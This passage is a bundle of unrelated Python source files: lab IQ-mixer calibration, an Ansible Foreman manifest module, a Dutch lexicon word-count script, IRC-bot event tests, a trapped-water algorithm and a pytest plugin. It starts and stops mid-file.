            resolution = self._requested_cal.get_radiation_parameters()[
                "waveform_resolution"]
            if_period = 1 / if_freq * 1e9  # ns

            # `if_period` is already in ns; the original compared
            # `(if_period * 1e9) % resolution`, which is virtually always 0
            # in float arithmetic and silenced this warning
            if if_period % resolution != 0:
                print(
                    f"IQVectorGenerator {self._name} warning: IF period is not divisible by "
                    "calibration waveform resolution. Phase coherence will be bad.")

            seq = pb.add_sine_pulse(self._marker_period).build()
            self._iqawg.output_pulse_sequence(seq)

            self._current_cal = self._requested_cal

    def _load_cal_db(self):
        """(Re)load the calibration database into memory."""
        self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0)

    def _around_frequency(self, frequency):
        """Snap `frequency` [Hz] to the nearest calibration-grid point."""
        return round(frequency / self._calibration_step) * self._calibration_step

    def get_calibration(self, frequency, power):
        """Return an IQ mixer calibration for (`frequency`, `power`).

        Looks up the cached calibration at the nearest grid frequency; when
        missing (or when recalibration is forced) performs a fresh mixer
        calibration and stores it.  Amplitudes are rescaled from the default
        calibration power to the requested `power`.
        """
        frequency = self._around_frequency(frequency)

        if self._cal_db is None:
            self._load_cal_db()

        cal = \
            self._cal_db.get(frozenset(dict(lo_power=14,
                                            ssb_power=self._default_calibration_power,
                                            lo_frequency=self._if_frequency + frequency,
                                            if_frequency=self._if_frequency,
                                            waveform_resolution=1,
                                            sideband_to_maintain='left').items()))
        if (cal is None) or self._recalibrate_mixer:
            calibrator = IQCalibrator(self._iqawg, self._sa, self._lo,
                                      self._cal_db_name, 0,
                                      sidebands_to_suppress=6,
                                      output_widget=self._calibration_widget)
            ig = self._calibration_initial_guess
            cal = calibrator.calibrate(
                lo_frequency=frequency + self._if_frequency,
                if_frequency=self._if_frequency,
                lo_power=14,
                ssb_power=self._default_calibration_power,
                waveform_resolution=1,
                iterations=3,
                minimize_iterlimit=100,
                sa_res_bandwidth=300,
                initial_guess=ig)
            save_IQMX_calibration(cal)

            self._load_cal_db()  # make sure to include new calibration into cache
            # rescale amplitudes from calibration power to the requested power
            cal._ssb_power = power
            cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
                10 ** ((self._default_calibration_power - power) / 10))
            # reuse the found phase as the starting guess for the next point
            self._calibration_initial_guess["if_phase"] = cal._if_phase
            return cal
        else:
            # NOTE(review): unlike the branch above, the cached-copy path does
            # not update cal._ssb_power — presumably intentional; confirm
            cal = cal.copy()
            cal._if_amplitudes = cal._if_amplitudes / np.sqrt(
                10 ** ((self._default_calibration_power - power) / 10))
            return cal

    def calibrate_mixer(self, fstart, fstop, recalibrate=False):
        """
        Performs calibration of the mixer in a frequency range

        Parameters
        ----------
        fstart: float
            start of the frequency range
        fstop : float
            stop of the frequency range
        recalibrate : bool
            Whether or not to calibrate from scratch and override previous
            calibration in this interval.
        """
        fstart = self._around_frequency(fstart)
        fstop = self._around_frequency(fstop)
        self._recalibrate_mixer = recalibrate
        pb = tqdm(np.arange(fstart, fstop + self._calibration_step, self._calibration_step),
                  smoothing=0)
        for frequency in pb:
            pb.set_description("%.3f GHz" % (frequency / 1e9))

            # retry with fresh random DC offsets when calibration is poor
            for counter in range(3):
                try:
                    self.set_frequency(frequency)
                    break
                except ValueError:
                    print("Poor calibration at %.3f GHz, retry count "
                          "%d" % (frequency / 1e9, counter))
                    # fixed key: was "dc_offest", a typo, so the randomized
                    # retry guess was silently ignored by the calibrator
                    self._calibration_initial_guess["dc_offsets"] = \
                        np.random.uniform(.03, 0.1, size=2)
        self._recalibrate_mixer = False

    def test_calibration(self, fstart, fstop, step=1e6,
                         sidebands_to_plot=[-1, 0, 1],
                         remeasure=False):
        """
        Tests the saved calibrations by monitoring all the sidebands throughout
        the specified frequency range
        Parameters
        ----------
        fstart: float, Hz
            start of the frequency range
        fstop: float, Hz
            stop of the frequency range
        step: float, Hz
            step of the scan
        remeasure : bool
            remeasure or just replot the data from the previous run
        """
        sideband_shifts = np.linspace(-3, 3, 7) * self._if_frequency
        freqs = np.arange(fstart, fstop + step, step)

        if remeasure or len(self._calibration_test_data) == 0:
            self._calibration_test_data = []
            for frequency in tqdm(freqs, smoothing=0):
                self.set_frequency(frequency)
                sa_freqs = sideband_shifts + self._frequency
                # NOTE(review): 7 sweep frequencies but only 3 bandwidth
                # entries — verify setup_list_sweep's expected argument shape
                self._sa.setup_list_sweep(list(sa_freqs), [1000] * 3)
                self._sa.prepare_for_stb()
                self._sa.sweep_single()
                self._sa.wait_for_stb()
                self._calibration_test_data.append(self._sa.get_tracedata())
            self._calibration_test_data = np.array(
                self._calibration_test_data).T

        sidebands_to_plot_idcs = np.array(sidebands_to_plot, dtype=int) + 3
        sideband_shifts = sideband_shifts[sidebands_to_plot_idcs]
        data = self._calibration_test_data[sidebands_to_plot_idcs]
        for row, sideband_shift in zip(data, sideband_shifts):
            plt.plot(freqs, row, label=f"{(sideband_shift / 1e6):.2f} MHz")
        plt.legend()

        # leave the spectrum analyzer in a sensible swept mode afterwards
        self._sa.setup_swept_sa(-self._if_frequency + self._frequency,
                                10 * self._if_frequency,
                                nop=1001, rbw=1e4)
        self._sa.set_continuous()

#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Andrew Kofink <ajkofink@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

from __future__ import absolute_import, division, print_function
__metaclass__ = type


# Ansible module documentation in YAML, rendered by `ansible-doc`.
DOCUMENTATION = '''
---
module: subscription_manifest
version_added: 1.0.0
short_description: Manage Subscription Manifests
description:
  - Upload, refresh and delete Subscription Manifests
author: "Andrew Kofink (@akofink)"
options:
  manifest_path:
    description:
      - Path to the manifest zip file
      - This parameter will be ignored if I(state=absent) or I(state=refreshed)
    type: path
  state:
    description:
      - The state of the manifest
    default: present
    choices:
      - absent
      - present
      - refreshed
    type: str
  repository_url:
    description:
       - URL to retrieve content from
    aliases: [ redhat_repository_url ]
    type: str
extends_documentation_fragment:
  - theforeman.foreman.foreman
  - theforeman.foreman.foreman.organization
'''

# Usage example shown by `ansible-doc`.
EXAMPLES = '''
- name: "Upload the RHEL developer edition manifest"
  theforeman.foreman.subscription_manifest:
    username: "admin"
    password: "changeme"
    server_url: "https://foreman.example.com"
    organization: "Default Organization"
    state: present
    manifest_path: "/tmp/manifest.zip"
'''

# This module returns no documented values.
RETURN = ''' # '''

from ansible_collections.theforeman.foreman.plugins.module_utils.foreman_helper import KatelloEntityAnsibleModule


def main():
    """Entry point: upload, refresh or delete an organization's subscription manifest."""
    module = KatelloEntityAnsibleModule(
        argument_spec=dict(
            manifest_path=dict(type='path'),
            state=dict(default='present', choices=['absent', 'present', 'refreshed']),
            repository_url=dict(aliases=['redhat_repository_url']),
        ),
        foreman_spec=dict(
            organization=dict(type='entity', required=True, thin=False),
        ),
        required_if=[
            ['state', 'present', ['manifest_path']],
        ],
        supports_check_mode=False,
    )

    # manifest import tasks can be slow server-side; allow up to 5 minutes
    module.task_timeout = 5 * 60

    with module.api_connection():
        organization = module.lookup_entity('organization')
        scope = module.scope_for('organization')

        # a previously imported manifest shows up as an upstream consumer
        try:
            existing_manifest = organization['owner_details']['upstreamConsumer']
        except KeyError:
            existing_manifest = None

        if module.state == 'present':
            if 'repository_url' in module.foreman_params:
                # update the organization's CDN URL before uploading
                payload = {'redhat_repository_url': module.foreman_params['repository_url']}
                org_spec = dict(id=dict(), redhat_repository_url=dict())
                organization = module.ensure_entity('organizations', payload, organization, state='present', foreman_spec=org_spec)

            try:
                with open(module.foreman_params['manifest_path'], 'rb') as manifest_file:
                    files = {'content': (module.foreman_params['manifest_path'], manifest_file, 'application/zip')}
                    params = {}
                    if 'repository_url' in module.foreman_params:
                        params['repository_url'] = module.foreman_params['repository_url']
                    params.update(scope)
                    # task errors are inspected manually below, so don't fail here
                    result = module.resource_action('subscriptions', 'upload', params, files=files, record_change=False, ignore_task_errors=True)
                    for error in result['humanized']['errors']:
                        if "same as existing data" in error:
                            # Nothing changed, but everything ok
                            break
                        if "older than existing data" in error:
                            module.fail_json(msg="Manifest is older than existing data.")
                        else:
                            module.fail_json(msg="Upload of the manifest failed: %s" % error)
                    else:
                        # no error broke out of the loop -> the upload changed something
                        module.set_changed()
            except IOError as e:
                module.fail_json(msg="Unable to read the manifest file: %s" % e)
        elif module.desired_absent and existing_manifest:
            module.resource_action('subscriptions', 'delete_manifest', scope)
        elif module.state == 'refreshed':
            if existing_manifest:
                module.resource_action('subscriptions', 'refresh_manifest', scope)
            else:
                module.fail_json(msg="No manifest found to refresh.")


# standard Ansible module entry point
if __name__ == '__main__':
    main()

# coding: utf-8

# Copyright (C) 2017 Open Path View, Maison Du Libre
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.

# Contributors: Benjamin BERNARD <benjamin.bernard@openpathview.fr>
# Email: team@openpathview.fr
# Description: Camera Set Partition, represent a partition of ImagesSets.

from typing import NamedTuple, List
from opv_import.model import ImageSet

class CameraSetPartition(NamedTuple):
    """Immutable record describing one partition of ImagesSets.

    Field order matches the original functional NamedTuple definition and
    must not change, since instances may be built positionally.
    """
    ref_set: ImageSet
    images_sets: List[ImageSet]
    start_indexes: List[int]
    fetcher_next_indexes: List[int]
    break_reason: str
    number_of_incomplete_sets: int
    number_of_complete_sets: int
    max_consecutive_incomplete_sets: int

#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
add word counts to Cornetto lexical units database file

The word count file should have three columns, delimited by white space,
containing (1) the count, (2) the lemma, (3) the main POS tag.
The tagset is assumed to be the Spoken Dutch Corpus tagset,
and the character encoding must be ISO-8859-1.

The counts appear as the value of the feature "count" on <form> elements.
The updated lexical units xml database is written to standard output.

Since we have only the lemma and the POS, and no word sense, the frequency
information is added to each matching lexical unit regardless of its sense
(i.e. the value of the "c_seq_nr" attribute).
"""

# TODO:
# - deal with multiword counts


# module metadata, also used for the --version output below
__author__ = 'Erwin Marsi <e.marsi@gmail.com>'
__version__ = '0.6'

from sys import stderr, stdout
from xml.etree.cElementTree import iterparse, SubElement, tostring, ElementTree

from cornetto.argparse import ArgumentParser, RawDescriptionHelpFormatter


def read_counts(file):
    """Read a whitespace-delimited word-count file and aggregate the counts.

    Each line must hold (1) a count, (2) a lemma, (3) a CGN main POS tag.
    Returns ``(counts, totals)`` where ``counts`` maps each word form to a
    per-category dict (noun/verb/adj/other) and ``totals`` sums the counts
    per category.  Ill-formed lines are reported on stderr and skipped.
    """
    if not hasattr(file, "read"):
        file = open(file)

    counts = {}
    totals = dict(noun=0, verb=0, adj=0, other=0)

    for l in file:
        try:
            count, form, tag = l.strip().split()
        except ValueError:
            stderr.write("Warning; ill-formed line: %s\n" % repr(l))
            continue

        # translate CGN tagset to word category
        if tag in ("N", "VNW", "TW", "SPEC"):
            cat = "noun"
        elif tag in ("WW",):
            # fixed: ("WW") without a comma is a plain string, so the original
            # `tag in ("WW")` was a substring test that also matched tag "W"
            cat = "verb"
        elif tag in ("ADJ", "BW"):
            cat = "adj"
        else:
            # LET LID TSW VG VZ
            cat = "other"

        # Cornetto word forms are stored in unicode; only decode byte-oriented
        # input (Python 2 str / files opened in binary mode)
        if isinstance(form, bytes):
            form = form.decode("iso-8859-1")
        count = int(count)

        if form not in counts:
            counts[form] = dict(noun=0, verb=0, adj=0, other=0)

        counts[form][cat] += count
        totals[cat] += count

    return counts, totals



def add_count_attrib(counts, totals, cdb_lu_file):
    """Annotate each <form> element with its word count, put per-category and
    overall totals on the document root, and return the updated tree."""
    # map Cornetto's category spellings onto the keys used in `counts`
    cat_aliases = {"adjective": "adj", "adverb": "other"}

    events = iterparse(cdb_lu_file)
    for _, node in events:
        if node.tag != "form":
            continue
        # following the ElementTree conventions,
        # word form will be ascii or unicode
        word = node.get("form-spelling")
        # lower case because Cornette is not consistent
        category = node.get("form-cat").lower()
        # fix category flaws in current release of Cornetto
        category = cat_aliases.get(category, category)

        try:
            freq = counts[word][category]
        except KeyError:
            # form not found
            freq = 0

        node.set("count", str(freq))

    # Finally, add totals, per category and overall, to the doc root.
    # Note that all words _not_ in Cornetto are not included in these totals
    totals["all"] = sum(totals.values())
    for category, freq in totals.items():
        events.root.set("count-total-%s" % category, str(freq))

    return ElementTree(events.root)


# Command-line interface: parse arguments, add the counts, then write the
# updated lexical-units database to standard output.
parser = ArgumentParser(description=__doc__,
                        version="%(prog)s version " + __version__,
                        formatter_class=RawDescriptionHelpFormatter)

# NOTE(review): `type=file` relies on the Python 2 builtin `file`, which was
# removed in Python 3 — this script is Python 2 only as written.
parser.add_argument("cdb_lu", type=file,
                    help="xml file containing the lexical units")

parser.add_argument("word_counts", type=file,
                    help="tabular file containing the word counts")

args = parser.parse_args()


counts, totals = read_counts(args.word_counts)

etree = add_count_attrib(counts, totals, args.cdb_lu)

etree.write(stdout, encoding="utf-8")


#def add_statistics_elem(counts, cdb_lu_file):

    #"""
    #adds a separate <statistics> element, 
    #which accomodates for other counts for other sources
    #"""
    #parser = iterparse(cdb_lu_file)
    
    #for event, elem in parser:
        #if elem.tag == "cdb_lu":
            #try:
                #count = counts[form][cat]
            #except KeyError:
                #count = 0
            
            #freq_el = SubElement(elem, "statistics")
            #SubElement(freq_el, "count", scr="uvt").text = str(count)
            
        #elif elem.tag == "form":
            ## following the ElementTree conventions, 
            ## word form will be ascii or unicode
            #form = elem.get("form-spelling")
            #cat = elem.get("form-cat")
            
    #return ElementTree(parser.root)

# Copyright © 2016  Lars Peter Søndergaard <lps@chireiden.net>
# Copyright © 2016  FichteFoll <fichtefoll2@googlemail.com>
#
# This file is part of Shanghai, an asynchronous multi-server IRC bot.
#
# Shanghai is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shanghai is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Shanghai.  If not, see <http://www.gnu.org/licenses/>.

import asyncio
from unittest import mock

import pytest

from shanghai import event
from shanghai.logging import Logger, get_logger, LogLevels

# use this when debug log output is desired; DDEBUG is the most verbose level
debug_logger = get_logger('logging', 'debug')
debug_logger.setLevel(LogLevels.DDEBUG)


@pytest.fixture
def loop():
    """Provide the default asyncio event loop to tests."""
    event_loop = asyncio.get_event_loop()
    return event_loop


@pytest.fixture
def evt():
    """Provide a minimal event instance named "event"."""
    built = event.build_event("event")
    return built


# base class to subclass for an actual plugin
class BasePlugin:
    """Minimal base class that concrete test plugins derive from."""


@pytest.fixture
def sample_plugin():
    """Build a throwaway plugin class carrying one decorated handler."""
    class TestPlugin(BasePlugin):
        @event.event
        def on_test(self):
            pass
    return TestPlugin


class TestPriority:
    """Tests for the event.Priority constants."""

    def test_type(self):
        # priorities must be usable anywhere an int is expected
        assert isinstance(event.Priority.DEFAULT, int)

    def test_order(self):
        ordered = [
            event.Priority.PRE_CORE,
            event.Priority.CORE,
            event.Priority.POST_CORE,
            event.Priority.PRE_DEFAULT,
            event.Priority.DEFAULT,
            event.Priority.POST_DEFAULT,
        ]
        # each priority strictly outranks the next one in the list
        assert all(a > b for a, b in zip(ordered, ordered[1:]))

    def test_lookup(self):
        core = event.Priority.CORE
        assert event.Priority.lookup(core) is core
        assert event.Priority.lookup(core.value) is core
        assert event.Priority.lookup(-12312412) == -12312412


class TestEvent:
    """Tests for event construction."""

    def test_build_event(self):
        built = event.build_event("evt_name", arg1="val1", arg2=None)
        expected_args = {'arg1': "val1", 'arg2': None}
        assert built.name == "evt_name"
        assert built.args == expected_args


class TestPrioritizedSetList:
    """Behavioral tests for event._PrioritizedSetList."""

    def test_bool(self):
        psl = event._PrioritizedSetList()
        # empty -> falsy; non-empty -> truthy
        assert bool(psl) is False
        psl.add(0, None)
        assert bool(psl) is True

    def test_add(self):
        psl = event._PrioritizedSetList()
        items = [(i,) for i in range(5)]

        psl.add(0, items[0])
        assert psl.list == [(0, {items[0]})]

        psl.add(0, items[1])
        assert psl.list == [(0, {items[0], items[1]})]

        psl.add(10, items[2])
        assert psl.list == [(10, {items[2]}),
                            (0,  {items[0], items[1]})]

        psl.add(-10, items[3])
        assert psl.list == [( 10, {items[2]}),            # noqa: E201
                            (  0, {items[0], items[1]}),  # noqa: E201
                            (-10, {items[3]})]

        psl.add(-1, items[4])
        assert psl.list == [( 10, {items[2]}),            # noqa: E201
                            (  0, {items[0], items[1]}),  # noqa: E201
                            ( -1, {items[4]}),            # noqa: E201
                            (-10, {items[3]})]

    def test_add_already_added(self):
        psl = event._PrioritizedSetList()
        thing = object()
        psl.add(0, thing)

        # re-adding is rejected at the same and at a different priority
        for priority in (0, 1):
            with pytest.raises(ValueError) as excinfo:
                psl.add(priority, thing)
            excinfo.match(r"has already been added")

    def test_contains(self):
        psl = event._PrioritizedSetList()
        thing = object()

        psl.add(0, thing)
        assert thing in psl

    def test_iter(self):
        psl = event._PrioritizedSetList()
        items = [(i,) for i in range(5)]
        for index, item in enumerate(items):
            psl.add(-index, item)

        # iteration yields (priority, set) pairs, highest priority first
        for index, entry in enumerate(psl):
            assert entry == (-index, {items[index]})

    def test_remove(self):
        psl = event._PrioritizedSetList()
        item = (1,)

        psl.add(1, item)
        assert psl
        psl.remove(item)
        assert not psl

        with pytest.raises(ValueError) as excinfo:
            psl.remove(item)
        excinfo.match(r"can not be found")


# Skipping HandlerInfo tests
# since that is only to be used with the `event` decorator anyway.
class TestEventDecorator:
    """Tests for the @event.event decorator family."""

    def test_no_param_usage(self):
        @event.event
        def func_name(self):
            pass

        @event.event
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        info = on_test._h_info
        # an `on_` prefix is stripped from the event name; other function
        # names are used verbatim
        assert info.event_name == "test"
        assert func_name._h_info.event_name == "func_name"
        assert info.handler is on_test
        assert info.priority is event.Priority.DEFAULT
        assert info.should_enable
        assert not info.is_async

    def test_param_usage(self):
        @event.event('evt_test', priority=-12, enable=False)
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        info = on_test._h_info
        assert info.event_name == 'evt_test'
        assert info.handler is on_test
        assert info.priority == -12
        assert not info.should_enable
        assert not info.is_async

    def test_async_handler(self):
        @event.event(enable=False)
        async def on_async_test(self):
            pass

        assert hasattr(on_async_test, '_h_info')
        info = on_async_test._h_info
        assert info.event_name == 'async_test'
        assert info.handler is on_async_test
        assert info.priority is event.Priority.DEFAULT
        assert not info.should_enable
        assert info.is_async

    def test_prefix(self):
        import functools
        prefixed_event = functools.partial(event.event, _prefix="__test_")

        @prefixed_event
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        assert on_test._h_info.event_name == '__test_test'

    def test_core_event_deco(self):
        @event.core_event
        def on_test(self):
            pass

        assert hasattr(on_test, '_h_info')
        assert on_test._h_info.priority is event.Priority.CORE

    def test_non_callable(self):
        with pytest.raises(TypeError) as excinfo:
            event.event(123)
        excinfo.match(r"Expected string, callable or None as first argument")

        with pytest.raises(TypeError) as excinfo:
            event.event("name")([])
        excinfo.match(r"Callable must be a function \(`def`\)"
                      r" or coroutine function \(`async def`\)")


class TestHandlerInstance:
    """Tests for :class:`event.HandlerInstance`."""

    def test_from_handler(self):
        """A decorated function can be wrapped into a HandlerInstance."""
        @event.event
        def handler():
            pass

        inst = event.HandlerInstance.from_handler(handler)
        assert inst.info is handler._h_info
        assert inst.handler is handler._h_info.handler
        assert inst.enabled

    def test_from_not_handler(self):
        """Wrapping an undecorated function raises ValueError."""
        def func():
            pass

        with pytest.raises(ValueError) as exc:
            event.HandlerInstance.from_handler(func)
        exc.match(r"Event handler must be decorated with `@event`")

    def test_hash(self):
        """Instances for the same handler hash equal without being equal."""
        @event.event
        def handler():
            pass

        first = event.HandlerInstance.from_handler(handler)
        second = event.HandlerInstance.from_handler(handler)
        assert first is not second
        assert hash(first) == hash(second)
        assert first != second


class TestResultSet:
    """Tests for :class:`event.ResultSet` accumulation behaviour."""

    def test_extend(self, evt, loop):
        """extend() merges ReturnValues, other ResultSets, and ignores None."""
        async def corofunc():
            pass

        coro = corofunc()
        coro2 = corofunc()
        # Await both once so no "coroutine never awaited" warning fires.
        loop.run_until_complete(coro)
        loop.run_until_complete(coro2)

        rval = event.ReturnValue(append_events=[evt])
        rval2 = event.ReturnValue(eat=True, schedule={coro})
        rval3 = event.ReturnValue(append_events=[evt], insert_events=[evt],
                                  schedule={coro, coro2})

        merged = event.ResultSet()
        other = event.ResultSet()

        merged.extend(rval)
        assert not merged.eat
        assert merged.append_events == [evt]
        merged.extend(rval2)
        assert merged.eat
        assert merged.schedule == {coro}
        other.extend(rval3)
        merged.extend(other)
        merged.extend(None)
        assert merged.eat
        assert merged.append_events == [evt, evt]
        assert merged.insert_events == [evt]
        assert merged.schedule == {coro, coro2}

    def test_iadd(self, evt):
        """``+=`` behaves like extend()."""
        plain = event.ReturnValue(append_events=[evt])
        eating = event.ReturnValue(eat=True, append_events=[evt])
        merged = event.ResultSet()

        merged += plain
        merged += eating
        merged += None
        assert merged.eat
        assert merged.append_events == [evt, evt]

    def test_type(self):
        """Unsupported operand types are rejected."""
        merged = event.ResultSet()
        for unsupported in ([], False):
            with pytest.raises(NotImplementedError):
                merged.extend(unsupported)


class TestEventDispatcher:
    """Tests for :class:`event.EventDispatcher` registration and dispatch."""

    @pytest.fixture
    def dispatcher(self):
        """Return a fresh dispatcher for each test."""
        return event.EventDispatcher()

    def test_register(self, dispatcher):
        """Registered handlers appear in the dispatcher's event map."""
        name = "some_name"

        @event.event(name)
        async def corofunc(*args):
            return True

        h_inst = event.HandlerInstance.from_handler(corofunc)
        dispatcher.register(h_inst)
        assert h_inst in dispatcher.event_map["some_name"]

    def test_register_plugin(self, dispatcher):
        """register_plugin picks up every decorated method of an object."""
        name = "some_name"

        class AClass:
            @event.event(name)
            def handler(self):
                pass

            # Fixed typo: this second, distinct handler was named ``hander``.
            @event.event(name)
            async def handler2(self):
                pass

        obj = AClass()
        h_insts = dispatcher.register_plugin(obj)
        assert len(dispatcher.event_map) == 1
        assert len(h_insts) == 2
        for h_inst in h_insts:
            assert h_inst in dispatcher.event_map[name]

    def test_dispatch(self, dispatcher, loop):
        """Handlers receive the event args and only run for their own event."""
        name = "some_name"
        args = dict(zip(map(str, range(10)), range(10, 20)))
        called = 0

        @event.event(name)
        async def corofunc(**local_args):
            nonlocal called
            assert local_args == args
            called += 1

        h_inst = event.HandlerInstance.from_handler(corofunc)
        dispatcher.register(h_inst)
        evt = event.Event(name, args)
        evt2 = evt._replace(name=evt.name + "_")
        loop.run_until_complete(dispatcher.dispatch(evt))
        loop.run_until_complete(dispatcher.dispatch(evt2))

        assert called == 1

    def test_dispatch_priority(self, dispatcher, loop, evt):
        """Higher-priority handlers run first."""
        called = list()

        @event.event(evt.name, priority=0)
        async def corofunc():
            called.append(corofunc)

        @event.event(evt.name, priority=1)
        def corofunc2():
            called.append(corofunc2)

        h_inst = event.HandlerInstance.from_handler(corofunc)
        h_inst2 = event.HandlerInstance.from_handler(corofunc2)
        dispatcher.register(h_inst)
        dispatcher.register(h_inst2)
        loop.run_until_complete(dispatcher.dispatch(evt))

        assert called == [corofunc2, corofunc]

    def test_dispatch_disabled(self, dispatcher, loop, evt):
        """Handlers registered as disabled are never invoked."""
        called = 0

        @event.event(evt.name, enable=False)
        async def corofunc():
            nonlocal called
            called += 1

        h_inst = event.HandlerInstance.from_handler(corofunc)
        dispatcher.register(h_inst)
        loop.run_until_complete(dispatcher.dispatch(evt))
        assert called == 0

    def test_dispatch_exception(self, loop, evt):
        """Exceptions raised by handlers are logged, not propagated."""
        logger = mock.Mock(Logger)
        dispatcher = event.EventDispatcher(logger=logger)
        called = 0

        @event.event(evt.name)
        async def corofunc():
            nonlocal called
            called += 1
            raise ValueError("yeah async")

        @event.event(evt.name)
        def handler():
            nonlocal called
            called += 1
            raise ValueError("yeah sync")

        dispatcher.register(event.HandlerInstance.from_handler(corofunc))
        dispatcher.register(event.HandlerInstance.from_handler(handler))
        assert not logger.exception.called
        loop.run_until_complete(dispatcher.dispatch(evt))
        assert called == 2
        assert logger.exception.call_count == 2

    def test_dispatch_unknown_return(self, loop, evt):
        """A handler returning an unexpected value triggers a warning."""
        logger = mock.Mock(Logger)
        dispatcher = event.EventDispatcher(logger=logger)
        called = False

        @event.event(evt.name)
        async def corofunc():
            nonlocal called
            called = True
            return "some arbitrary value"

        dispatcher.register(event.HandlerInstance.from_handler(corofunc))
        assert not logger.warning.called
        loop.run_until_complete(dispatcher.dispatch(evt))
        assert called
        assert logger.warning.call_count == 1

    def test_dispatch_eat(self, loop, evt):
        """A ReturnValue with eat=True stops lower-priority handlers."""
        dispatcher = event.EventDispatcher()
        called = [False] * 3

        @event.event(evt.name, priority=1)
        def corofunc():
            called[0] = True

        @event.event(evt.name, priority=0)
        async def corofunc2():
            called[1] = True
            return event.ReturnValue(eat=True)

        @event.event(evt.name, priority=-1)
        async def corofunc3():
            called[2] = True

        dispatcher.register(event.HandlerInstance.from_handler(corofunc))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc2))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc3))
        result = loop.run_until_complete(dispatcher.dispatch(evt))
        assert result.eat
        assert called == [True, True, False]

    def test_dispatch_nested_insert(self, loop, evt):
        """insert_events dispatch immediately; append/schedule accumulate."""
        dispatcher = event.EventDispatcher()
        called = [0] * 3
        evt1 = evt
        evt2 = evt._replace(name=evt.name + "_")
        evt3 = evt._replace(name=evt.name + "__")

        @event.event(evt.name)
        def corofunc1():
            called[0] += 1
            return event.ReturnValue(insert_events=[evt2], append_events=[evt])

        @event.event(evt2.name)
        def corofunc2():
            called[1] += 1
            return event.ReturnValue(insert_events=[evt3], append_events=[evt2])

        @event.event(evt3.name)
        def corofunc3():
            called[2] += 1

            async def corofunc():
                pass

            return event.ReturnValue(append_events=[evt3], schedule={corofunc()})

        dispatcher.register(event.HandlerInstance.from_handler(corofunc1))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc2))
        dispatcher.register(event.HandlerInstance.from_handler(corofunc3))
        result = loop.run_until_complete(dispatcher.dispatch(evt))
        assert called == [1, 1, 1]
        assert result.append_events == [evt1, evt2, evt3]
        assert len(result.schedule) == 1
        # prevent warnings again
        loop.run_until_complete(next(iter(result.schedule)))

    # TODO other ReturnValue tests

#!/usr/bin/env python3
"""Trapped-water on an m x n height map via heap flood-fill from the border.

Reads the grid from NUOC.INP and writes the trapped volume to NUOC.OUT.
"""
from heapq import heapify, heappop, heappush


with open('NUOC.INP') as f:
    m, n = map(int, f.readline().split())
    height = [[int(cell) for cell in row.split()] for row in f]

# Seed the frontier with every border cell; water always drains past them.
frontier = []
for j, h in enumerate(height[0]):
    frontier.append((h, 0, j))
for j, h in enumerate(height[-1]):
    frontier.append((h, m - 1, j))
for i in range(m):
    frontier.append((height[i][0], i, 0))
    frontier.append((height[i][-1], i, n - 1))
heapify(frontier)

# Border cells start visited, interior cells do not.
visited = [[i in (0, m - 1) or j in (0, n - 1) for j in range(n)]
           for i in range(m)]
result = 0

# Always expand from the lowest wall seen so far; any unvisited neighbour
# below that level traps exactly the difference.
while frontier:
    level, i, j = heappop(frontier)
    for x, y in ((i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1)):
        if 0 <= x < m and 0 <= y < n and not visited[x][y]:
            visited[x][y] = True
            result += max(0, level - height[x][y])
            heappush(frontier, (max(height[x][y], level), x, y))

with open('NUOC.OUT', 'w') as f:
    print(result, file=f)

""" Loads hyperspy as a regular python library, creates a spectrum with random numbers and plots it to a file"""

import hyperspy.api as hs
import numpy as np
import matplotlib.pyplot as plt

s = hs.signals.Spectrum(np.random.rand(1024))
s.plot()

plt.savefig("testSpectrum.png")

import inspect
import re

import pytest

from robottelo.logging import collection_logger as logger

IMPORTANCE_LEVELS = []


def pytest_addoption(parser):
    """Add CLI options related to Testimony token based mark collection"""
    # One flag per testimony token; dicts preserve declaration order.
    option_help = {
        '--importance': 'Comma separated list of importance levels to include in test collection',
        '--component': 'Comma separated list of component names to include in test collection',
        '--assignee': 'Comma separated list of assignees to include in test collection',
    }
    for flag, text in option_help.items():
        parser.addoption(flag, help=text)


def pytest_configure(config):
    """Register markers related to testimony tokens"""
    markers = (
        'importance: CaseImportance testimony token, use --importance to filter',
        'component: Component testimony token, use --component to filter',
        'assignee: Assignee testimony token, use --assignee to filter',
    )
    for line in markers:
        config.addinivalue_line("markers", line)


def _testimony_token_regex(token, group):
    """Compile a case-insensitive pattern for ':<token>: <value>' lines."""
    return re.compile(rf'\s*:{token}:\s*(?P<{group}>\S*)', re.IGNORECASE)


# To match :CaseComponent: FooBar
component_regex = _testimony_token_regex('CaseComponent', 'component')

# To match :CaseImportance: Critical
importance_regex = _testimony_token_regex('CaseImportance', 'importance')

# To match :Assignee: jsmith
assignee_regex = _testimony_token_regex('Assignee', 'assignee')


@pytest.hookimpl(tryfirst=True)
def pytest_collection_modifyitems(session, items, config):
